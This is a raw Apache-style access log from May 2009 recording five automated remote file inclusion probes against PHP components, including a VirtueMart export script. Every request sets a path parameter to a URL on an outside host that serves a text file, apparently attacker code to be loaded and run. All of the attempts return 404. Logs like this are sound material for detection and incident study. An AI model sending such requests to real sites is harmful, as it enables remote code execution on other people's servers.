122.153.212.195 - - [15/May/2009:00:26:36 -0400] "GET /logs/access_log.Q108100900///skin/zero_vote/ask_password.php?dir=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.172.92.14 - - [15/May/2009:00:27:01 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.803"
69.172.92.14 - - [15/May/2009:00:27:01 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.803"
69.172.92.14 - - [15/May/2009:00:27:02 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.803"
87.106.135.14 - - [15/May/2009:00:27:17 -0400] "GET /logs/access_log.Q109041200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.mamet.wen.ru/MADONGCMD.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
